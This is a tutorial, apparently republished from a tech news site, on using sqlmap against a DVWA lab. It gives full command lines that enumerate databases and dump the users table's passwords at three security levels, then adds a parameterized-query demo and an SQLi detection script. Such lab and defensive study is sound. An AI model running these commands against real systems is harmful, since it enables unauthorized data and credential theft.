
Example Analysis of Sqlmap Automation injection

2025-01-16 Update From: SLTechnology News&Howtos shulou

Shulou(Shulou.com)05/31 Report--

This article shares an example analysis of sqlmap automated injection. The editor thinks it is very practical and shares it here for study; I hope you get something out of it.

Automatic injection of dvwa using sqlmap

1. Set the DVWA security level to low.

2. Open DVWA's SQL Injection page (SQL Injection (Blind)), open the browser's developer tools, enter a user ID and submit it, then view the intercepted request.

3. You can see that it is a GET request with the URL "http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#".

4. Test it directly with sqlmap, using the -u option:

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#"

5. You can see that a login is required here; otherwise no results come back. So we need to add a cookie to keep the session logged in.

6. Use the Burp Suite proxy to capture the request, get the login cookie, and add --dbs to enumerate the databases:

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" --dbs

You can see that the database returned is mysql.

7. Use -D xxx to specify the database to view, and --tables to list all the tables in that database:

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tables

Check the results of the run:

8. Use -D xxx -T ttt to specify the table to view, and --columns to list the columns of that table:

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns

9. Use -D xxx to select the database, -T xxx to select the table, -C xxx to select the columns, and --dump to view the data in those columns:

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users -C password,user --dump
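Why the id parameter in the steps above gives access to the whole users table, and what closes it: the following is an added example, not code from the original article or from DVWA. It models the lookup with an in-memory sqlite3 table; the table contents and function names are assumptions made for this example.

```python
import sqlite3

def make_db():
    """Constructed stand-in for a users table (sample rows, not DVWA's data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "hash-a"), (2, "gordon", "hash-b"), (3, "pablo", "hash-c")],
    )
    return db

def lookup_vulnerable(db, user_id):
    # The id value is pasted into the SQL text, so the database parses it as SQL.
    query = ("SELECT user FROM users WHERE user_id = '" + user_id +
             "' ORDER BY user_id")
    return [row[0] for row in db.execute(query)]

def lookup_parameterized(db, user_id):
    # The id value is bound as data; the SQL text is fixed and never re-parsed.
    query = "SELECT user FROM users WHERE user_id = ? ORDER BY user_id"
    return [row[0] for row in db.execute(query, (user_id,))]

def lookup_validated(db, user_id):
    # Defence in depth: accept only a plain integer before the query runs.
    if not user_id.isdigit():
        raise ValueError("id must be numeric")
    return lookup_parameterized(db, int(user_id))

if __name__ == "__main__":
    db = make_db()
    tautology = "1' OR '1'='1"   # constructed input that changes the WHERE clause
    print("concatenated :", lookup_vulnerable(db, tautology))
    print("parameterized:", lookup_parameterized(db, tautology))
```

With the concatenated query the constructed input returns every row; with the bound parameter the same input is compared as a literal value and matches nothing.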

Adjust the DVWA security level to medium, save the captured request as a .txt file, put it in the sqlmap directory, and run sqlmap directly with -r <file name> --dbs (subsequent parameters can be added by yourself).

Adjust the DVWA security level to high. Since the page where the data is submitted is not the same as the page that returns the results, the previous method cannot be used here. Second-order injection must be used instead.

The URL where the data is submitted

Returned URL

Save the captured request as a .txt file, put it in the sqlmap directory, and enumerate the databases with the command:

-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --batch --level 2 --dbs

Enumerate the table names

-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --batch --level 2 -D dvwa --tables

Enumerate the column names

-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --batch --level 2 -D dvwa -T users --columns

Dump the column data

-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --batch --level 2 -D dvwa -T users -C user,password --dump

Some conceptual issues:

Second-order injection: in second-order SQL injection, the result of the data entered at the injection point is sometimes returned not on the current page but on another page, so you need to specify which page's response is used to determine whether the result is true or false. --second-url is followed by the URL of the page that returns the result.

--batch: uses the default configuration automatically, without manually pressing yes or no.

--level: sqlmap has 5 detection levels in total, and the default is 1. The higher the level, the more payloads are used for probing. Level 5 uses the most payloads and automatically tests cookie, XFF and other header injection. Of course, the higher the level, the slower the detection. This parameter also affects which injection points are tested: GET and POST data are always tested, the HTTP Cookie is tested when the level is 2, and the HTTP User-Agent/Referer headers are tested when the level is 3. When it is uncertain which parameter is the injection point, it is recommended to set the level to 5 to ensure accuracy (the speed also slows down).
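Because the level decides whether the cookie and the User-Agent/Referer headers are probed as well as the GET and POST data, request inspection on the defending side has to cover the same fields. The following detection sketch is an added example, not part of the original article or of sqlmap; the request records, field names and patterns are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed request records (not captured traffic); field names are this example's own.
REQUESTS = [
    {"query": "id=1&Submit=Submit", "cookie": "security=low",
     "user_agent": "Mozilla/5.0", "referer": ""},
    {"query": "id=1%27%20AND%20SLEEP%285%29--%20&Submit=Submit", "cookie": "security=low",
     "user_agent": "sqlmap/1.x#stable (https://sqlmap.org)", "referer": ""},
    {"query": "id=2&Submit=Submit", "cookie": "security=low' UNION SELECT NULL-- ",
     "user_agent": "Mozilla/5.0", "referer": ""},
    {"query": "id=3&Submit=Submit", "cookie": "security=low",
     "user_agent": "Mozilla/5.0", "referer": "http://example.test/' OR 1=1-- "},
]

# Fields that carry probes: parameters (default level), cookie, User-Agent/Referer.
FIELDS = ("query", "cookie", "user_agent", "referer")

# Small illustrative pattern set: quote followed by OR/AND, UNION SELECT,
# time-delay functions, and a trailing SQL comment.
SQLI = re.compile(
    r"['\"]\s*(?:or|and)\b|union\s+select|sleep\s*\(|benchmark\s*\(|--\s", re.I)

def inspect(request):
    """Return (field, reason) pairs for every suspicious field in one request."""
    findings = []
    # A client can send any User-Agent, so this is only a first-pass signal.
    if "sqlmap" in request["user_agent"].lower():
        findings.append(("user_agent", "sqlmap default User-Agent"))
    for field in FIELDS:
        value = unquote_plus(request[field])   # decode %27, %20, + before matching
        if SQLI.search(value):
            findings.append((field, "SQL syntax in value"))
    return findings

def summarize(requests):
    """Sorted list of flagged field names per request."""
    return [sorted({field for field, _ in inspect(r)}) for r in requests]

if __name__ == "__main__":
    for number, fields in enumerate(summarize(REQUESTS)):
        print(number, fields or "clean")
```

A filter that only checks the query string would miss the third and fourth records, where the probe sits in the cookie and the Referer header.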

This concludes the example analysis of sqlmap automated injection. It covers some points that you may see or use in daily work, and I hope you can learn more from this article.
